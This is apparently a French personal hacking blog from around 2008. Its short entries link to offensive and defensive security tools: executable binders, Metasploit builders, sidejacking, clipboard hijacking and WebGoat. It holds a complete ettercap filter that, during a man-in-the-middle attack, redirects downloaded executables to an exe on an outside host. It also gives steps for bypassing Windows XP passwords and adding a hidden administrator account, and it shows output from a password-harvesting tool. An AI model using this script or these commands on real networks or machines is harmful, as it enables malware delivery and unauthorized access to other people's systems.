Iexpress & RessourceHacker

Voici une de mes veilles vidéo tuto sur le Bind d' exécutoire
( Fichier-1.exe + Fichier-2 => FichierBinder.exe ).
et modification d'icone comme de description soit effacer les traces du Bind .

Video-Tuto

MSF Exploit Builder

Voici un Gui pour windows qui compilara des exploite de Metasploit
Download
Info pdf

Reset mot de passe XP & VISTA

Pc_Login_Now accede a la partition de windows pout changer les propriétes de ses utilisateurs.
Download ISO
Dans le meme style Ophcrack

Windsurfer - Extension WiFi Gratuite

Augnenter gratuitement votre signal wifi, simple à réaliser je vous laisse regardé la videos
Donc voici la structure pour une antenne
et pour une clé usb
(meme idée antenne)
(meme idée usb)

Google Chrome (Beta) - Navigateur par Google

Navigateur de google en version beta à tester...
A première vue, il m'a l'aire très pratique et agréable, je vous laisse découvrir.
Sinon je reste septique sur le coté pub...

Video demo

GooGle Chrome Beta

Attaque Tempest

C'est une technique qui consiste a recupérer les ondes d"un moniteur pour en reformer sont image ( soit espionnage, utilisé par le gouvernement et services secret)
Il y a un projet open source a ce sujet EckBox
Voici un logiciel qui le demontre, "Tempest For EliZA" qui va utilisé votre moniteur pour émettr des ondes(mp3) sur votre radio.(malheureusement le site est en 404,je vais essayé de trouvé une autre source de download)

Liens:
http://linuxfr.org/2001/11/28/6117.html
http://www.hackaday.com/2005/12/25/tempest-for-eliza/

OSWA - Wireless Hacking & Auditing LiveCD Toolkit

Voici un live cd avec tous les outils pour l'analyse et securité de reseau wifi

Site
Download
USB-BOOT OSWA

Ettercap / etterfilter MIM Any Exe

Voici une démonstration du style Man in the middle, celle ci remplace n'importe exécutoire téléchargé par des Windows par celui qui vous avez définit

Video


Script

# replace rmccurdy with your website
# replace the url with what ever exe you like





if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
  # note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("keep-alive", "close" ");
replace("Keep-Alive", "close" ");

}



if (ip.proto == TCP && search(DATA.data, ": application") ){
# enable for logging log(DECODED.data, "/tmp/log.log");
msg("found EXE\n");
# "Win32" is the first part of the exe example:
# if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
if (search(DATA.data, "Win32")) {
msg("doing nothing\n");
} else {
replace("200 OK", "301 Moved Permanently
Location: http://www.rmccurdy.com/scripts/quickclean.exe
");
msg("redirect success\n");

}
}

Google comme Proxy

Google comme proxy , ça c'est du proxy de confiance (pour les log) ;)

GooGle-PoXy

Surfjack - Sidejacking

Programme qui intercepte les cookies sur un réseau soit pure Sidejacking

Download
Video-Demo
Autre technique
(Ferret & Hamster)

Grendel-Scan - Scanner de faille Web By DEFCON

Voici un très beau scanner de failles créer par un membre de DEFCON
C'est compatible sous toutes les plateformes :)
Tres complet et pour ne pas prendre une page a montrer ce qu'il fait, je vous laisse y jeter un œil!

Le slide
Download

ArpOn

ArpOn a été créer pour rendre les requetes ARP plus sûr ! (ARP Poisoning/Spoofing attacks).Tres utile si vous vous connecté souvent dans des endroits public! ;)
En gros ,il analyse les paquets ARP et peut les bloqué.

Voici la Doc & le log
(Mac OS X , FreeBSD , NetBSD , OpenBSD and Linux.)

IExplorer/Firefox avec noscript - clipboard hijacks

Firefox même avec nos script ne filtre pas bien le flash,ce qui permet d'avoir accès a votre presse papier

-> Tester ici
(Dans cet exemple, apres avoir visité la page ,faites un" coller" :) !

Références

http://www.trustedsource.org/blog/145/Rogue-Flash-ads-hijack-your-clipboard
http://news.bbc.co.uk/2/hi/technology/7567889.stm
http://www.theregister.co.uk/2008/08/15/webbased_clipboard_hijacking/
http://blogs.pcmag.com/securitywatch/2008/08/mac_users_get_clipboardjacked.php
http://blogs.zdnet.com/security/?p=1733
http://www.scmagazineus.com/Clipboards-hijacked-by-furtive-code/article/115503
http://www.sophos.com/security/blog/2008/08/1671.html?_log_from=rss

-> Source

I Love FireFox

Voici les addons que je vous consille pour l'analyse et sécurité
Sécurité
Noscript
Javascripter bloquer
Keyscrambler
Anti-keylloger
Analyse
Tamper data
Analyse de requetes
FireBug
Analyse de page source
FireCookie
Analyse et edition de cookie
Firephp
Analyse du dialogue php
HackBar
Encoder/decoder/splitter ...d'url

Gifar

Reporté par les Black hat voici une attaque original qui mele Un Gif/DOC a une archive ZIP/JAR

Demonstration en Video

gOs 3

Nouvelle distribution LINUX basée sur Ubuntu 7

Site_officiel

MSN FIX

Vous avez un problemes msn comme un ver qui parle a votre place ou envoye des fichiers...
MSN Fix rendra votre msn clean !

Download

CsrWalker - processes detection

Voici un anti rootkit créer par un createur de rootkit :)
Il analyse tous les processus grace à C:\Windows\system32\csrsrv.DLL et determine sont qui sont cahé ou pas ! :)
Détails
Download

Megaupload ilimité non prenium

Voici une astuce sans logiciel pour telecharger un quota illimité a la vitesse max !

Tres simple, pour commencé cliquer sur votre lien pour ensuite tapez le code de confirmation.
Un decompte va se faire, attentez....... et c'est la que est l'astuce!
Ne cliquer pas sur le lien mais enregistrer la cible sous...
(si vous avez cliquer dessus, changer votre ip et effacé vos cookies)

Bypass a Windows XP Password compil

Ces méthodes ont le but de Bypasser un mot passe en accès physique !

1° Démarrage sans echecs (F8) > La session administrateur va apparaitre( par défaut pas de mot de passe ^^ )
> panneau de config > gestion des comptes > gestion mot de passe

2° Au logon ,si vous ne savez pas changer l'identifiant faite 2 fois CTRL-ALT-DELETE > tapez administrateur sans mot de passe

3° En cours de session (non admin) ,dans exécuté taper "control userpasswords2" et là, vous pouvez gerer les comptes

4° En cours de session (non admin) ,ouvrez une fenêtre dos pour tape "at 12:59 /interactive "cmd.exe"">la une fenêtre dos va s ourvir
(root :) ) > ensuite CTRL-ALT-DELETE terminer le processus explorer.exe > taper dans la fenêtre dos(root) explorer.exe (c:\windows\)
5° En cours de session, ouvrer une fentre dos et taper

net user name password /add
net localgroup Administrateurs name /add

WebGoat 5.2 - Entrainnez vous

WebGoat est un projet du groupe OWASP qui permet de s'entrainer sur plusieurs failles web !
Plus d'infos ici
Attention,je vous conseil de couper votre connection internet que vous l'utiliser car vous devez installer un server Tomcat avec de nombreuses failles!

Download WebGoat
Download Videos Demo Webgoat

PEBKAC Attack

Voici une tres bonne idée de IronGeek ,qui est de chercher des mot de passe de session dans les log de sécurité !
Un tool a été créer pour plus de facilité, il recherche une mauvaise authentification pour ensuite la comparer a l'identifiant de la suivant avec qui s'est déroulé avec sucé.
Bien sur cette methode n'est pas a 100% fiable.
Attaque local
C:\>pebkac.exe
Irongeek's PEBKAC Attack on the Windows Security Event Log ver .1
Successful Login (18): Adrian
Possible Password (2): ir0n g33k

Successful Login (871): Adrian
Possible Password (869): network logon password
Attaque a distance
C:\>pebkac.exe \\cthulhu
Irongeek's PEBKAC Attack on the Windows Security Event Log ver .1
Working on \\cthulhu...

Successful Login (868): Admin
Possible Password (864): god

Successful Login (871): Adrian
Possible Password (869): network logon password

Download PEBKAC

Caractéres invisible et speciaux

Si vous ne le saviez pas ,ils existe des caractéres speciaux et invisible qu'il est possible d'inscrire grace a une combinaison de touche [ATL+NUM]
Ceux ci, se trouve par ici
Démarrer > Programmes > accessoires > Outils système > Table des caractères (cliquer sur affichage avancé pour voir la combinaison du caractère)

Cela pour nous servir pour 2 astuces

-Creastion de super mot de passe
Je crois pas qu'un brute force vas testé ce caractére ♣
De plus que certain keylogger ne le retiendrais pas.
-Copie de pseudonyme
Certains caracteres sont invisible mais existe!
ex: ATL+160 Admin = Admin
Vive le SE...

Ghosts pour IE 7 et IE8

Après le hijacking d'iframes sous IE 6 & IE7 , Sirdarkcat nous demontre enore une autre varainte qui fonctionne sur un plus grand nombre d'iternaut !
Ce lien ouvrir le site Hackademix.com et vas capturer les touche de votre clavier en haut a gauche dans le rectagle rouge.

-> Test Poc

Black Hat 2008

Comment ne pas parler de ses conferences tres interesantes !
En voici le slide et ses exploits

Ce blog ?

Ce blog vas me servir de penses bête , j'y mettrai des information et technique qui tourne autour de la sécurité informatique & web.

Moi ?

M*G
Ancien admin de Magichack (Bad Digites T3am)
xss,rfi,sql-injection -> I Love it! :)

@+